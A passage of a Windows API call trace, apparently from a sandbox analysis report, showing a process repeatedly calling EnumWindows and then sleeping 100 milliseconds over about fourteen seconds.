(lpEnumFunc=0x3d23dd0, lParam=0x540000) [0179.281] Sleep (dwMilliseconds=0x64) [0179.686] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0179.686] Sleep (dwMilliseconds=0x64) [0179.939] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0179.939] Sleep (dwMilliseconds=0x64) [0180.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.031] Sleep (dwMilliseconds=0x64) [0180.126] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.127] Sleep (dwMilliseconds=0x64) [0180.266] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.266] Sleep (dwMilliseconds=0x64) [0180.358] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.358] Sleep (dwMilliseconds=0x64) [0180.408] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.408] Sleep (dwMilliseconds=0x64) [0180.437] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.437] Sleep (dwMilliseconds=0x64) [0180.468] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.468] Sleep (dwMilliseconds=0x64) [0180.543] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0180.544] Sleep (dwMilliseconds=0x64) [0181.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.154] Sleep (dwMilliseconds=0x64) [0181.240] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.241] Sleep (dwMilliseconds=0x64) [0181.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.277] Sleep (dwMilliseconds=0x64) [0181.336] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.337] Sleep (dwMilliseconds=0x64) [0181.380] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.381] Sleep (dwMilliseconds=0x64) [0181.402] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.403] Sleep (dwMilliseconds=0x64) [0181.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.607] Sleep (dwMilliseconds=0x64) [0181.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0181.826] Sleep (dwMilliseconds=0x64) [0182.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0182.185] Sleep (dwMilliseconds=0x64) [0182.278] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0182.279] Sleep (dwMilliseconds=0x64) [0182.369] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0182.370] Sleep (dwMilliseconds=0x64) [0182.500] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0182.500] Sleep (dwMilliseconds=0x64) [0183.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.093] Sleep (dwMilliseconds=0x64) [0183.194] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.225] Sleep (dwMilliseconds=0x64) [0183.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.312] Sleep (dwMilliseconds=0x64) [0183.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.653] Sleep (dwMilliseconds=0x64) [0183.713] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.713] Sleep (dwMilliseconds=0x64) [0183.827] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0183.828] Sleep (dwMilliseconds=0x64) [0184.383] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0184.383] Sleep (dwMilliseconds=0x64) [0184.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0184.497] Sleep (dwMilliseconds=0x64) [0184.678] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0184.679] Sleep (dwMilliseconds=0x64) [0184.860] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0184.860] Sleep (dwMilliseconds=0x64) [0184.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0184.979] Sleep (dwMilliseconds=0x64) [0185.159] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.163] Sleep (dwMilliseconds=0x64) [0185.191] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.191] Sleep (dwMilliseconds=0x64) [0185.213] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.214] Sleep (dwMilliseconds=0x64) [0185.254] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.255] Sleep (dwMilliseconds=0x64) [0185.313] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.313] Sleep (dwMilliseconds=0x64) [0185.333] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.336] Sleep (dwMilliseconds=0x64) [0185.345] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.346] Sleep (dwMilliseconds=0x64) [0185.380] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.380] Sleep (dwMilliseconds=0x64) [0185.438] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.438] Sleep (dwMilliseconds=0x64) [0185.487] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.487] Sleep (dwMilliseconds=0x64) [0185.532] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.693] Sleep (dwMilliseconds=0x64) [0185.797] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.797] Sleep (dwMilliseconds=0x64) [0185.841] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.842] Sleep (dwMilliseconds=0x64) [0185.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.889] Sleep (dwMilliseconds=0x64) [0185.935] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0185.936] Sleep (dwMilliseconds=0x64) [0186.025] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.025] Sleep (dwMilliseconds=0x64) [0186.096] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.097] Sleep (dwMilliseconds=0x64) [0186.125] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.126] Sleep (dwMilliseconds=0x64) [0186.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.187] Sleep (dwMilliseconds=0x64) [0186.230] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.231] Sleep (dwMilliseconds=0x64) [0186.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.295] Sleep (dwMilliseconds=0x64) [0186.509] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.509] Sleep (dwMilliseconds=0x64) [0186.554] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.588] Sleep (dwMilliseconds=0x64) [0186.639] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.639] Sleep (dwMilliseconds=0x64) [0186.697] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.698] Sleep (dwMilliseconds=0x64) [0186.734] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.735] Sleep (dwMilliseconds=0x64) [0186.749] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.750] Sleep (dwMilliseconds=0x64) [0186.764] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.764] Sleep (dwMilliseconds=0x64) [0186.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.811] Sleep (dwMilliseconds=0x64) [0186.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.858] Sleep (dwMilliseconds=0x64) [0186.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0186.919] Sleep (dwMilliseconds=0x64) [0187.016] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.017] Sleep (dwMilliseconds=0x64) [0187.027] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.027] Sleep (dwMilliseconds=0x64) [0187.077] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.077] Sleep (dwMilliseconds=0x64) [0187.116] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.116] Sleep (dwMilliseconds=0x64) [0187.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.120] Sleep (dwMilliseconds=0x64) [0187.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.136] Sleep (dwMilliseconds=0x64) [0187.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.185] Sleep (dwMilliseconds=0x64) [0187.205] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.206] Sleep (dwMilliseconds=0x64) [0187.218] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.219] Sleep (dwMilliseconds=0x64) [0187.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.248] Sleep (dwMilliseconds=0x64) [0187.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.296] Sleep (dwMilliseconds=0x64) [0187.315] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.315] Sleep (dwMilliseconds=0x64) [0187.358] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.358] Sleep (dwMilliseconds=0x64) [0187.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.386] Sleep (dwMilliseconds=0x64) [0187.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.436] Sleep (dwMilliseconds=0x64) [0187.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.574] Sleep (dwMilliseconds=0x64) [0187.624] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.624] Sleep (dwMilliseconds=0x64) [0187.683] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.683] Sleep (dwMilliseconds=0x64) [0187.701] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.701] Sleep (dwMilliseconds=0x64) [0187.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.714] Sleep (dwMilliseconds=0x64) [0187.763] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.764] Sleep (dwMilliseconds=0x64) [0187.789] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.789] Sleep (dwMilliseconds=0x64) [0187.793] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.793] Sleep (dwMilliseconds=0x64) [0187.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.811] Sleep (dwMilliseconds=0x64) [0187.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.858] Sleep (dwMilliseconds=0x64) [0187.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.878] Sleep (dwMilliseconds=0x64) [0187.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.888] Sleep (dwMilliseconds=0x64) [0187.920] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.920] Sleep (dwMilliseconds=0x64) [0187.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.964] Sleep (dwMilliseconds=0x64) [0187.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.983] Sleep (dwMilliseconds=0x64) [0187.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0187.999] Sleep (dwMilliseconds=0x64) [0188.029] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.030] Sleep (dwMilliseconds=0x64) [0188.076] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.077] Sleep (dwMilliseconds=0x64) [0188.095] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.095] Sleep (dwMilliseconds=0x64) [0188.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.107] Sleep (dwMilliseconds=0x64) [0188.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.139] Sleep (dwMilliseconds=0x64) [0188.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.185] Sleep (dwMilliseconds=0x64) [0188.206] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.207] Sleep (dwMilliseconds=0x64) [0188.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.214] Sleep (dwMilliseconds=0x64) [0188.234] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.235] Sleep (dwMilliseconds=0x64) [0188.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.279] Sleep (dwMilliseconds=0x64) [0188.326] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.327] Sleep (dwMilliseconds=0x64) [0188.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.389] Sleep (dwMilliseconds=0x64) [0188.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.435] Sleep (dwMilliseconds=0x64) [0188.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.480] Sleep (dwMilliseconds=0x64) [0188.544] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.545] Sleep (dwMilliseconds=0x64) [0188.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.561] Sleep (dwMilliseconds=0x64) [0188.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.607] Sleep (dwMilliseconds=0x64) [0188.645] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.645] Sleep (dwMilliseconds=0x64) [0188.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.654] Sleep (dwMilliseconds=0x64) [0188.691] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.691] Sleep (dwMilliseconds=0x64) [0188.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.732] Sleep (dwMilliseconds=0x64) [0188.762] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.762] Sleep (dwMilliseconds=0x64) [0188.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.779] Sleep (dwMilliseconds=0x64) [0188.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.826] Sleep (dwMilliseconds=0x64) [0188.848] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.849] Sleep (dwMilliseconds=0x64) [0188.858] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.858] Sleep (dwMilliseconds=0x64) [0188.885] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.886] Sleep (dwMilliseconds=0x64) [0188.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.933] Sleep (dwMilliseconds=0x64) [0188.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0188.983] Sleep (dwMilliseconds=0x64) [0189.055] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.056] Sleep (dwMilliseconds=0x64) [0189.084] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.089] Sleep (dwMilliseconds=0x64) [0189.125] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.126] Sleep (dwMilliseconds=0x64) [0189.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.167] Sleep (dwMilliseconds=0x64) [0189.195] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.200] Sleep (dwMilliseconds=0x64) [0189.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.216] Sleep (dwMilliseconds=0x64) [0189.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.264] Sleep (dwMilliseconds=0x64) [0189.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.296] Sleep (dwMilliseconds=0x64) [0189.363] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.364] Sleep (dwMilliseconds=0x64) [0189.424] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.424] Sleep (dwMilliseconds=0x64) [0189.468] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.469] Sleep (dwMilliseconds=0x64) [0189.522] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.525] Sleep (dwMilliseconds=0x64) [0189.578] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.579] Sleep (dwMilliseconds=0x64) [0189.623] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.623] Sleep (dwMilliseconds=0x64) [0189.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.671] Sleep (dwMilliseconds=0x64) [0189.694] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.695] Sleep (dwMilliseconds=0x64) [0189.725] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.725] Sleep (dwMilliseconds=0x64) [0189.750] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.751] Sleep (dwMilliseconds=0x64) [0189.796] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.797] Sleep (dwMilliseconds=0x64) [0189.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.842] Sleep (dwMilliseconds=0x64) [0189.905] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.906] Sleep (dwMilliseconds=0x64) [0189.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.951] Sleep (dwMilliseconds=0x64) [0189.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.967] Sleep (dwMilliseconds=0x64) [0189.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0189.980] Sleep (dwMilliseconds=0x64) [0190.156] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.157] Sleep (dwMilliseconds=0x64) [0190.212] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.212] Sleep (dwMilliseconds=0x64) [0190.226] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.226] Sleep (dwMilliseconds=0x64) [0190.229] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.229] Sleep (dwMilliseconds=0x64) [0190.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.261] Sleep (dwMilliseconds=0x64) [0190.310] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.310] Sleep (dwMilliseconds=0x64) [0190.363] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.363] Sleep (dwMilliseconds=0x64) [0190.420] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.421] Sleep (dwMilliseconds=0x64) [0190.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.482] Sleep (dwMilliseconds=0x64) [0190.548] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.548] Sleep (dwMilliseconds=0x64) [0190.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.558] Sleep (dwMilliseconds=0x64) [0190.607] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.608] Sleep (dwMilliseconds=0x64) [0190.655] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.655] Sleep (dwMilliseconds=0x64) [0190.674] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.675] Sleep (dwMilliseconds=0x64) [0190.685] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.686] Sleep (dwMilliseconds=0x64) [0190.713] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.714] Sleep (dwMilliseconds=0x64) [0190.798] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.798] Sleep (dwMilliseconds=0x64) [0190.828] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.828] Sleep (dwMilliseconds=0x64) [0190.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.839] Sleep (dwMilliseconds=0x64) [0190.855] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.858] Sleep (dwMilliseconds=0x64) [0190.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.902] Sleep (dwMilliseconds=0x64) [0190.949] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0190.950] Sleep (dwMilliseconds=0x64) [0191.015] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.015] Sleep (dwMilliseconds=0x64) [0191.109] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.110] Sleep (dwMilliseconds=0x64) [0191.158] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.159] Sleep (dwMilliseconds=0x64) [0191.166] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.167] Sleep (dwMilliseconds=0x64) [0191.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.214] Sleep (dwMilliseconds=0x64) [0191.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.267] Sleep (dwMilliseconds=0x64) [0191.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.297] Sleep (dwMilliseconds=0x64) [0191.362] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.363] Sleep (dwMilliseconds=0x64) [0191.410] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.410] Sleep (dwMilliseconds=0x64) [0191.453] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.454] Sleep (dwMilliseconds=0x64) [0191.520] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.521] Sleep (dwMilliseconds=0x64) [0191.565] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.566] Sleep (dwMilliseconds=0x64) [0191.581] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.581] Sleep (dwMilliseconds=0x64) [0191.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.593] Sleep (dwMilliseconds=0x64) [0191.646] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.646] Sleep (dwMilliseconds=0x64) [0191.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.677] Sleep (dwMilliseconds=0x64) [0191.833] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.867] Sleep (dwMilliseconds=0x64) [0191.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.871] Sleep (dwMilliseconds=0x64) [0191.885] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.886] Sleep (dwMilliseconds=0x64) [0191.903] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.904] Sleep (dwMilliseconds=0x64) [0191.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.917] Sleep (dwMilliseconds=0x64) [0191.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.935] Sleep (dwMilliseconds=0x64) [0191.950] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.951] Sleep (dwMilliseconds=0x64) [0191.966] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.966] Sleep (dwMilliseconds=0x64) [0191.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0191.983] Sleep (dwMilliseconds=0x64) [0192.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.026] Sleep (dwMilliseconds=0x64) [0192.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.073] Sleep (dwMilliseconds=0x64) [0192.090] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.091] Sleep (dwMilliseconds=0x64) [0192.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.104] Sleep (dwMilliseconds=0x64) [0192.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.120] Sleep (dwMilliseconds=0x64) [0192.135] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.136] Sleep (dwMilliseconds=0x64) [0192.151] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.152] Sleep (dwMilliseconds=0x64) [0192.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.168] Sleep (dwMilliseconds=0x64) [0192.182] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.183] Sleep (dwMilliseconds=0x64) [0192.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.198] Sleep (dwMilliseconds=0x64) [0192.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.214] Sleep (dwMilliseconds=0x64) [0192.230] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.231] Sleep (dwMilliseconds=0x64) [0192.246] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.247] Sleep (dwMilliseconds=0x64) [0192.260] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.261] Sleep (dwMilliseconds=0x64) [0192.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.276] Sleep (dwMilliseconds=0x64) [0192.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.293] Sleep (dwMilliseconds=0x64) [0192.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.308] Sleep (dwMilliseconds=0x64) [0192.324] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.324] Sleep (dwMilliseconds=0x64) [0192.338] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.339] Sleep (dwMilliseconds=0x64) [0192.354] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.355] Sleep (dwMilliseconds=0x64) [0192.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.370] Sleep (dwMilliseconds=0x64) [0192.385] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.386] Sleep (dwMilliseconds=0x64) [0192.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.401] Sleep (dwMilliseconds=0x64) [0192.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.417] Sleep (dwMilliseconds=0x64) [0192.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.434] Sleep (dwMilliseconds=0x64) [0192.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.448] Sleep (dwMilliseconds=0x64) [0192.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.464] Sleep (dwMilliseconds=0x64) [0192.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.480] Sleep (dwMilliseconds=0x64) [0192.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.496] Sleep (dwMilliseconds=0x64) [0192.580] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.580] Sleep (dwMilliseconds=0x64) [0192.619] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.619] Sleep (dwMilliseconds=0x64) [0192.712] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.713] Sleep (dwMilliseconds=0x64) [0192.827] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.828] Sleep (dwMilliseconds=0x64) [0192.930] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0192.931] Sleep (dwMilliseconds=0x64) [0193.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.027] Sleep (dwMilliseconds=0x64) [0193.082] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.083] Sleep (dwMilliseconds=0x64) [0193.137] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.141] Sleep (dwMilliseconds=0x64) [0193.199] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.200] Sleep (dwMilliseconds=0x64) [0193.242] EnumWindows (lpEnumFunc=0x3d23dd0, 